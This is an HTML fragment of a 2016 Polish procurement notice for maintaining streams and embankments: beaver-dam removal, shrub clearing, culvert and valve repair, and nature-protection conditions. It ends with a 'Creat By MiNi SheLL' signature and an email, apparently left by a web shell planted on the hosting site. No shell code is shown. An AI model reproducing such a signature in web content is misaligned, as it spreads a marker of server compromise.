Zamiar i sposób prowadzenia robót konserwacyjnych na potokach został zgłoszony do Regionalnej Dyrekcji Ochrony Środowiska w Krakowie (kopie zgłoszeń oraz uzgodnienia RDOŚ są załącznikami do SIWZ). Sposób prowadzenia robót musi być zgodny z opisanym w zgłoszeniach i przy zachowaniu wymagań RDOŚ. Zadania wymagają ustanowienia nadzoru przyrodniczego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> - Potok Ostruszanka w km  2+378 - 4+200  -  konserwacja bieżąca 
- Potok Czermianka w km 2+025 - 4+830 - konserwacja bieżąca
- Potok Siekierczynka w km 2+000 - 2+500, 2+950 - 3+220, 3+610 - 3+710 - konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
- Potok Ostruszanka w km  2+378 - 4+200  -  konserwacja bieżąca 
- Potok Czermianka w km 2+025 - 4+830 - konserwacja bieżąca
- Potok Siekierczynka w km 2+000 - 2+500, 2+950 - 3+220, 3+610 - 3+710 - konserwacja bieżąca
Zamiar i sposób prowadzenia robót konserwacyjnych na potokach został zgłoszony do Regionalnej Dyrekcji Ochrony Środowiska w Krakowie (kopie zgłoszeń oraz uzgodnienia RDOŚ są załącznikami do SIWZ). Sposób prowadzenia robót musi być zgodny z opisanym w zgłoszeniach i przy zachowaniu wymagań RDOŚ. Zadania wymagają ustanowienia nadzoru przyrodniczego.
Zamówienie obejmuje:
Potok Ostruszanka -  Rozbiórka tamy bobrowej, wycinka zakrzaczeń na skarpach potoku. Zadanie znajduje się na terenie objętym ochroną przyrody - Park krajobrazowy, Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
Potok Czermianka - Usunięcie roślinności porastającej dno i skarpy potoku, wycinka zakrzaczeń na skarpach potoku, częściowa rozbiórka tam bobrowych. Zadanie znajduje się na terenie objętym ochroną przyrody - Park krajobrazowy, Obszar chronionego krajobrazu.  Obwód rybacki rzeki Wisłoka - nr 1
Potok Siekierczynka - Usunięcie roślinności porastającej skarpy potoku, wycinka zakrzaczeń na skarpach potoku, rozbiórka tamy bobrowej. Zadanie znajduje się na terenie objętym ochroną przyrody - Park krajobrazowy.  Obwód rybacki rzeki Biała Tarnowska - nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> - Potok Poźnianka w km  0+000 - 3+211 -  konserwacja bieżąca
- Potok Lubinka w km 0+000 - 1+230 - konserwacja bieżąca
- Potok Więckówka w km  4+300 - 7+500 -  konserwacja bieżąca
- Potok Zelina Gwożdziecka w km  3+200 - 3+300 -  konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
- Potok Poźnianka w km  0+000 - 3+211 -  konserwacja bieżąca
- Potok Lubinka w km 0+000 - 1+230 - konserwacja bieżąca
- Potok Więckówka w km  4+300 - 7+500 -  konserwacja bieżąca
- Potok Zelina Gwożdziecka w km  3+200 - 3+300 -  konserwacja bieżąca
Zamówienie obejmuje:
Potok Poźnianka - Usunięcie roślinności porastającej skarpy potoku, wycinka zakrzaczeń na skarpach potoku, rozbiórka tam bobrowych, odmulenie potoku w km 0+000 - 1+260. Zadanie znajduje się na terenie objętym ochroną przyrody - Natura 2000, Park krajobrazowy, Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
Potok Lubinka - Usunięcie roślinności porastającej skarpy potoku, wycinka zakrzaczeń na skarpach potoku, rozbiórka tamy bobrowej. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu. Obwód rybacki rzeki Dunajec - nr 7   
Potok Więckówka - Rozbiórka tam bobrowych, wycinka zakrzaczeń na skarpach potoku. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu.  Obwód rybacki rzeki Dunajec - nr 7 
Potok Zelina Gwożdziecka - Rozbiórka tam bobrowych. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu. Obwód rybacki rzeki Dunajec - nr 7
Zamiar i sposób prowadzenia robót konserwacyjnych na potokach został zgłoszony do Regionalnej Dyrekcji Ochrony Środowiska w Krakowie (kopie zgłoszeń oraz uzgodnienia RDOŚ są załącznikami do SIWZ). Sposób prowadzenia robót musi być zgodny z opisanym w zgłoszeniach i przy zachowaniu wymagań RDOŚ. Zadania wymagają ustanowienia nadzoru przyrodniczego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> - Potok Radlanka w km  4+630 - 5+650 -  konserwacja bieżąca
- Potok Wątok w km 11+600 - 12+200 i 12+850 - 12+900 -  konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
- Potok Radlanka w km  4+630 - 5+650 -  konserwacja bieżąca
- Potok Wątok w km 11+600 - 12+200 i 12+850 - 12+900 -  konserwacja bieżąca
Zamówienie obejmuje:
Potok Radlanka - Rozbiórka tam bobrowych. Zadanie znajduje się na terenie objętym ochroną przyrody -Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
Potok Wątok - Rozbiórka tamy bobrowej. Zadanie znajduje się na terenie objętym ochroną przyrody - Obszar chronionego krajobrazu. Obwód rybacki rzeki Biała Tarnowska - nr 2
Zamiar i sposób prowadzenia robót konserwacyjnych na potokach został zgłoszony do Regionalnej Dyrekcji Ochrony Środowiska w Krakowie (kopie zgłoszeń oraz uzgodnienia RDOŚ są załącznikami do SIWZ). Sposób prowadzenia robót musi być zgodny z opisanym w zgłoszeniach i przy zachowaniu wymagań RDOŚ. Zadania wymagają ustanowienia nadzoru przyrodniczego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Warunki płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wały rzeki Żabnica-Breń w km: P 11+330-11+650, 11+650-13+410, 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810, 15+900-17+200, 17+380-18+270, 20+900-21+300, L: 11+240-11+250, 12+200-12+350, 12+400-12+500, 12+580-12+590 - likwidacja kolein i zaniżenia ramp przejazdowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadań pn:
Wały rzeki Żabnica-Breń w km: P 11+330-11+650, 11+650-13+410, 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810, 15+900-17+200, 17+380-18+270, 20+900-21+300, L: 11+240-11+250, 12+200-12+350, 12+400-12+500, 12+580-12+590 - likwidacja kolein i zaniżenia ramp przejazdowych.
Zamówienie obejmuje:
Naprawa rozszczelnionego rurociągu betonowego dł. 10m przez demontaż                             i wymianę na rurociąg z rury polietylenowej typu Weholite-Spiro, naprawa okładziny betonowej przyczółka wylotowego, usunięcie popękanego odchylonego przyczółka betonowego wlotowego i zastąpienie go prefabrykowanym żelbetowym przyczółkiem dokowym. Demontaż skorodowanej klapy zwrotnej stalowej O60 i wymiana na  klapę zwrotną skośną O60 wykonaną z polietylenu wysokiej gęstości HDPE, klapa powinna mieć atest producenta o dopuszczalnym nadciśnieniu roboczym minimum 0,3 bar, wymiana ubezpieczenia dna i skarp odpływu i dopływu płytami ażurowymi (palisada z kołków), udrożnienie odpływu i dopływu warstwą do 20 cm wraz z wyprofilowaniem skarp, obsiew mieszanką traw korony i skarp wałów. Wycięcie drzewa 1 szt. (Dąb) wraz z karczunkiem po stronie przyczółka wlotowego. Obiekt przewidziany do naprawy zlokalizowany jest na działkach prywatnych. Dojazd do śluzy wałowej również po działkach prywatnych. Uzyskanie zgód leży po stronie Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Warunki płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com